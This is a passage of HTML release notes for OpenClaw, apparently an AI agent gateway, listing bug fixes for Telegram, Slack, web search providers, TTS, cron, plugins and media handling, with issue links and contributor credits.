<p>Config: log the "newer OpenClaw" version warning once per process instead of once per config snapshot read. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367749952" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75927" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75927/hovercard" href="https://github.com/openclaw/openclaw/pull/75927">#75927</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RomneyDa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RomneyDa">@RomneyDa</a>.</p>
</li>
<li>
<p>Telegram/message actions: treat benign delete-message 400s as no-op warnings instead of runtime errors, so stale or already-removed messages do not create noisy delete failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345339727" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73726" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73726/hovercard" href="https://github.com/openclaw/openclaw/issues/73726">#73726</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Avicennasis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Avicennasis">@Avicennasis</a>.</p>
</li>
<li>
<p>Telegram: split long default markdown sends and media follow-up text into safe HTML chunks, so outbound messages over Telegram's limit no longer fail as one oversized Bot API request. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367257816" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75868" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75868/hovercard" href="https://github.com/openclaw/openclaw/issues/75868">#75868</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhengsx/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhengsx">@zhengsx</a>.</p>
</li>
<li>
<p>Gateway/chat history: merge Claude CLI transcript imports for Anthropic-routed sessions that still have a Claude CLI binding, so local chat history does not hide CLI JSONL turns. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367073060" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75850" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75850/hovercard" href="https://github.com/openclaw/openclaw/issues/75850">#75850</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alfredjbclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alfredjbclaw">@alfredjbclaw</a>.</p>
</li>
<li>
<p>Media: trim serialized JSON suffixes after local <code>MEDIA:</code> directive file extensions, so generated-image metadata cannot pollute the parsed media path and cause false <code>ENOENT</code> delivery failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360047482" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75182" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75182/hovercard" href="https://github.com/openclaw/openclaw/issues/75182">#75182</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TnzGit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TnzGit">@TnzGit</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</p>
</li>
<li>
<p>Plugins/runtime: hot-reload Gateway plugin runtime surfaces after plugin enable/disable changes while keeping source-changing plugin install, update, and uninstall operations restart-backed so loaded module code is not reused. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330564867" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72097" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72097/hovercard" href="https://github.com/openclaw/openclaw/issues/72097">#72097</a>.</p>
</li>
<li>
<p>Cron: make scheduler reload schedule comparison tolerate malformed persisted jobs, so one bad cron entry no longer aborts the whole tick. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367497925" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75886" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75886/hovercard" href="https://github.com/openclaw/openclaw/issues/75886">#75886</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samfox-ai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samfox-ai">@samfox-ai</a>.</p>
</li>
<li>
<p>Doctor/channels: warn after migrations when default Telegram or Discord accounts have no configured token and their env fallback (<code>TELEGRAM_BOT_TOKEN</code> or <code>DISCORD_BOT_TOKEN</code>) is unavailable, with secret-safe migration docs for checking state-dir <code>.env</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350080379" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74298" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74298/hovercard" href="https://github.com/openclaw/openclaw/issues/74298">#74298</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lolaopenclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lolaopenclaw">@lolaopenclaw</a>.</p>
</li>
<li>
<p>Gateway/diagnostics: keep idle liveness samples in telemetry instead of visible warning logs unless diagnostic work is active, waiting, or queued. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Channels/cron: reject provider-prefixed targets for the wrong channel and let prefixed announce targets such as <code>telegram:123</code> select their channel when delivery falls back to <code>last</code>, so Telegram IDs cannot be coerced into WhatsApp phone numbers. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4162988650" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56839" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56839/hovercard" href="https://github.com/openclaw/openclaw/issues/56839">#56839</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bencoremans/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bencoremans">@bencoremans</a>.</p>
</li>
<li>
<p>Control UI/chat: keep live replies visible when a raw session alias such as <code>main</code> sends the chat turn but Gateway emits events under the canonical session key for the same run. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345216396" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73716" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73716/hovercard" href="https://github.com/openclaw/openclaw/issues/73716">#73716</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teebes/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teebes">@teebes</a>.</p>
</li>
<li>
<p>CLI/models: reject <code>--agent</code> on <code>openclaw models set</code> and <code>set-image</code> instead of silently writing agent-scoped requests to global model defaults. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4286636018" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68391" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68391/hovercard" href="https://github.com/openclaw/openclaw/issues/68391">#68391</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/derrickabellard/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/derrickabellard">@derrickabellard</a>.</p>
</li>
<li>
<p>CLI: stop treating the legacy singular <code>openclaw tool ...</code> token as a plugin id under restrictive <code>plugins.allow</code>, so it falls through as a normal unknown/reserved command instead of suggesting a stale allowlist entry. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4243981916" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64732" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64732/hovercard" href="https://github.com/openclaw/openclaw/issues/64732">#64732</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/efe-arv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/efe-arv">@efe-arv</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SweetSophia/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SweetSophia">@SweetSophia</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hashtag1974/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hashtag1974">@hashtag1974</a>.</p>
</li>
<li>
<p>Media: write inbound media buffers through same-directory temp files before rename, so failed disk writes do not leave zero-byte artifacts for later voice transcription. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4154946745" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55966" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55966/hovercard" href="https://github.com/openclaw/openclaw/issues/55966">#55966</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OpenCodeEngineer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OpenCodeEngineer">@OpenCodeEngineer</a>.</p>
</li>
<li>
<p>TTS/Telegram: keep trusted local audio generated by the TTS tool queued for voice-note delivery even when the run-level built-in tool list omits the raw <code>tts</code> name. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354905008" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74752" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74752/hovercard" href="https://github.com/openclaw/openclaw/issues/74752">#74752</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Loveworld3033/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Loveworld3033">@Loveworld3033</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/andyliu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/andyliu">@andyliu</a>.</p>
</li>
<li>
<p>TTS: require explicit user or config audio intent for the agent speech tool so dashboard chats stay text unless audio is requested. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4303803702" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69777" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69777/hovercard" href="https://github.com/openclaw/openclaw/issues/69777">#69777</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alexandre-leng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alexandre-leng">@alexandre-leng</a>.</p>
</li>
<li>
<p>Plugins/config: keep bundled source-checkout plugins from being runtime-gated by install-only <code>minHostVersion</code> metadata, accept prerelease host floors, trim plugin-service startup failures to one log line, and avoid broad channel-runtime loading during base config parsing. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Heartbeat: strip legacy <code>[TOOL_CALL]...[/TOOL_CALL]</code> and <code>[TOOL_RESULT]...[/TOOL_RESULT]</code> pseudo-call blocks from heartbeat replies before channel delivery. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4131762668" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54138" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54138/hovercard" href="https://github.com/openclaw/openclaw/issues/54138">#54138</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Deniable9570/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Deniable9570">@Deniable9570</a>.</p>
</li>
<li>
<p>macOS/Voice Wake: send wake-word and Push-to-Talk transcripts through the selected macOS session target instead of always falling back to main WebChat. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4107671050" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51040" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51040/hovercard" href="https://github.com/openclaw/openclaw/issues/51040">#51040</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/carl-jeffrolc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/carl-jeffrolc">@carl-jeffrolc</a>.</p>
</li>
<li>
<p>Providers/xAI: give Grok <code>web_search</code> a 60s default timeout, harden malformed xAI Responses parsing, and return structured timeout errors instead of aborting the tool call. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4175237199" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58063" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58063/hovercard" href="https://github.com/openclaw/openclaw/issues/58063">#58063</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4183930735" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58733" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58733/hovercard" href="https://github.com/openclaw/openclaw/issues/58733">#58733</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dnishimura/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dnishimura">@dnishimura</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/marvcasasola-svg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/marvcasasola-svg">@marvcasasola-svg</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nanako0129/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nanako0129">@Nanako0129</a>.</p>
</li>
<li>
<p>Providers/configure: preserve the existing default model when adding or reauthing a provider whose plugin returns a default-model config patch. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4099627324" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50268" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/50268/hovercard" href="https://github.com/openclaw/openclaw/issues/50268">#50268</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rixcorp-oc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rixcorp-oc">@rixcorp-oc</a>.</p>
</li>
<li>
<p>Slack/message actions: send media before the follow-up Block Kit message when Slack <code>send</code> includes a file plus presentation or interactive controls, so file attachments are no longer rejected. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4111591995" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51458" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51458/hovercard" href="https://github.com/openclaw/openclaw/issues/51458">#51458</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HirokiKobayashi-R/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HirokiKobayashi-R">@HirokiKobayashi-R</a>.</p>
</li>
<li>
<p>Slack/DMs: honor <code>dmHistoryLimit</code> for fresh 1:1 Slack DM sessions by backfilling recent conversation history before the current reply. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4240708914" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64427" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64427/hovercard" href="https://github.com/openclaw/openclaw/issues/64427">#64427</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brantley-creator/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brantley-creator">@brantley-creator</a>.</p>
</li>
<li>
<p>Slack/DMs: keep top-level direct messages on the stable DM session even when <code>replyToMode</code> targets Slack thread replies, preserving context across DM turns. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4184870759" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58832" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58832/hovercard" href="https://github.com/openclaw/openclaw/issues/58832">#58832</a>. Thanks @daye-jjeong.</p>
</li>
<li>
<p>Slack/delivery: preserve Slack Web API missing-scope details in outbound delivery errors, so queued retry state identifies the OAuth scope to add. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4216375787" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62391" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62391/hovercard" href="https://github.com/openclaw/openclaw/issues/62391">#62391</a>. Thanks @alexey-pelykh.</p>
</li>
<li>
<p>Slack/capabilities: read granted scopes from <code>auth.test</code> response metadata before trying legacy scope APIs, so modern bot tokens no longer report <code>unknown_method</code> for channel capabilities. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4068646797" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44625" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44625/hovercard" href="https://github.com/openclaw/openclaw/issues/44625">#44625</a>. Thanks @Qquanwei and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>.</p>
</li>
<li>
<p>Slack/DMs: send text/block-only proactive DMs directly with <code>chat.postMessage(channel=&lt;user id&gt;)</code> while keeping conversation resolution for uploads and threaded sends. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4213098355" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62042" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62042/hovercard" href="https://github.com/openclaw/openclaw/issues/62042">#62042</a>. Thanks @MarkMolina.</p>
</li>
<li>
<p>Slack/routing: match route bindings written with Slack target syntax such as <code>channel:C...</code>, <code>user:U...</code>, or <code>&lt;@U...&gt;</code>, so bound Slack peers route to the configured agent instead of <code>main</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4048907648" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41608" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/41608/hovercard" href="https://github.com/openclaw/openclaw/issues/41608">#41608</a>. Thanks @Winnsolutionsadmin.</p>
</li>
<li>
<p>Slack/routing: match public-channel allowlist entries written as <code>channel:C...</code> against bare Slack runtime channel IDs, so allowed channel mentions do not fail as <code>channel-not-allowed</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4046643845" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41264" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/41264/hovercard" href="https://github.com/openclaw/openclaw/issues/41264">#41264</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4160915756" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56530" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/56530/hovercard" href="https://github.com/openclaw/openclaw/pull/56530">#56530</a>. Thanks @babutree and @Realworld404.</p>
</li>
<li>
<p>Slack/message actions: prefer the account bound to the outbound target peer before falling back to the agent's first channel account, so multi-workspace sends use the intended Slack account. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4264751663" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66807" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66807/hovercard" href="https://github.com/openclaw/openclaw/pull/66807">#66807</a>. Thanks @rijhsinghani.</p>
</li>
<li>
<p>Slack/delivery: retry Slack Web API writes only when the SDK wraps a DNS request failure such as <code>EAI_AGAIN</code>, so transient resolver hiccups can recover without retrying platform errors that may duplicate messages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289779783" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68789" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68789/hovercard" href="https://github.com/openclaw/openclaw/issues/68789">#68789</a>. Thanks @sonnyb9.</p>
</li>
<li>
<p>Slack/message actions: forward agent-scoped media roots through the bundled upload-file action path, so workspace files can be attached without failing the local-media guard. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4242973170" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64625" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64625/hovercard" href="https://github.com/openclaw/openclaw/issues/64625">#64625</a>. Thanks @benpchandler.</p>
</li>
<li>
<p>Slack/mentions: resolve <code>&lt;!subteam^...&gt;</code> user-group mentions through Slack <code>usergroups.users.list</code> and treat them as explicit mentions only when the bot user is a member, so mention-gated agent channels wake for real user-group mentions without config-only allowlists. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346503795" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73827" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73827/hovercard" href="https://github.com/openclaw/openclaw/issues/73827">#73827</a>. Thanks @CG-Intelligence-Agent-Jack.</p>
</li>
<li>
<p>Slack/message tool: let <code>read</code> fetch an exact Slack message timestamp, including a specific thread reply when paired with <code>threadId</code>, instead of returning only the parent thread or recent channel history. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4130437054" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53943" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53943/hovercard" href="https://github.com/openclaw/openclaw/issues/53943">#53943</a>. Thanks @zomars.</p>
</li>
<li>
<p>PDF/Gemini: send native PDF analysis API keys in the <code>x-goog-api-key</code> header instead of the request URL, keeping secrets out of proxy and access logs. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4202693803" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60600" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60600/hovercard" href="https://github.com/openclaw/openclaw/pull/60600">#60600</a>. Thanks @garagon.</p>
</li>
<li>
<p>Web search/Gemini: route agent abort signals into provider fetches and log provider-side abort failures as normal tool errors instead of silently aborting the run. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4338236726" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72995" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72995/hovercard" href="https://github.com/openclaw/openclaw/issues/72995">#72995</a>. Thanks @RoseKongPS.</p>
</li>
<li>
<p>Web search: point missing-key errors to <code>web_fetch</code> for known URLs and the browser tool for interactive pages. Thanks @zhaoyang97.</p>
</li>
<li>
<p>Web search: late-bind managed agent <code>web_search</code> calls to the current runtime config snapshot, so existing sessions do not keep stale unresolved SecretRefs after secrets reload. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362762607" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75420" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75420/hovercard" href="https://github.com/openclaw/openclaw/issues/75420">#75420</a>. Thanks @richardmqq.</p>
</li>
<li>
<p>Web search/Gemini: reuse <code>models.providers.google.apiKey</code> and <code>models.providers.google.baseUrl</code> as lower-priority fallbacks for Gemini web search after dedicated search config and <code>GEMINI_API_KEY</code>. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4167524438" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/57496" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/57496/hovercard" href="https://github.com/openclaw/openclaw/pull/57496">#57496</a>. Thanks @Aoiujz.</p>
</li>
<li>
<p>Web search/Gemini: pass <code>freshness</code> and <code>date_after</code>/<code>date_before</code> filters through Google Search grounding time ranges. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4261488656" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66498" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66498/hovercard" href="https://github.com/openclaw/openclaw/issues/66498">#66498</a>. Thanks @ismael-81.</p>
</li>
<li>
<p>Web search/DuckDuckGo: include the keyless DuckDuckGo provider in the web search setup wizard. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4253504720" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65862" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65862/hovercard" href="https://github.com/openclaw/openclaw/issues/65862">#65862</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4254540581" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65940" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65940/hovercard" href="https://github.com/openclaw/openclaw/pull/65940">#65940</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jah-yee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jah-yee">@Jah-yee</a>.</p>
</li>
<li>
<p>Web search: honor <code>baseUrl</code> overrides for Gemini, Grok, and x_search provider-owned config, so proxy-backed search tools no longer dial hardcoded public endpoints. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4212565688" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61972" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61972/hovercard" href="https://github.com/openclaw/openclaw/pull/61972">#61972</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lanfei/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lanfei">@Lanfei</a>.</p>
</li>
<li>
<p>Web search/Brave: point Brave provider metadata at the canonical <code>/tools/brave-search</code> docs page and make the legacy <code>/brave-search</code> docs page a redirect stub. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4253527816" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65870" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65870/hovercard" href="https://github.com/openclaw/openclaw/issues/65870">#65870</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4253794124" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65892" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65892/hovercard" href="https://github.com/openclaw/openclaw/pull/65892">#65892</a>. Thanks @Magicray1217 and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jah-yee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jah-yee">@Jah-yee</a>.</p>
</li>
<li>
<p>Web search/Brave: allow <code>freshness</code> and bounded date ranges in <code>llm-context</code> mode, matching Brave's documented LLM Context API support. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4107380876" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51005" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/51005/hovercard" href="https://github.com/openclaw/openclaw/pull/51005">#51005</a>. Thanks @remusao.</p>
</li>
<li>
<p>Web fetch: resolve external plugin <code>webFetchProviders</code> for non-sandboxed <code>web_fetch</code>, while keeping sandboxed fetches limited to bundled providers. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355873723" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74915" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74915/hovercard" href="https://github.com/openclaw/openclaw/issues/74915">#74915</a>. Thanks @ultrahighsuper and @mingmingtsao.</p>
</li>
<li>
<p>Heartbeat: strip legacy <code>[TOOL_CALL]...[/TOOL_CALL]</code> and <code>[TOOL_RESULT]...[/TOOL_RESULT]</code> pseudo-call blocks from heartbeat replies before channel delivery. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4131762668" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54138" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54138/hovercard" href="https://github.com/openclaw/openclaw/issues/54138">#54138</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Deniable9570/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Deniable9570">@Deniable9570</a>.</p>
</li>
<li>
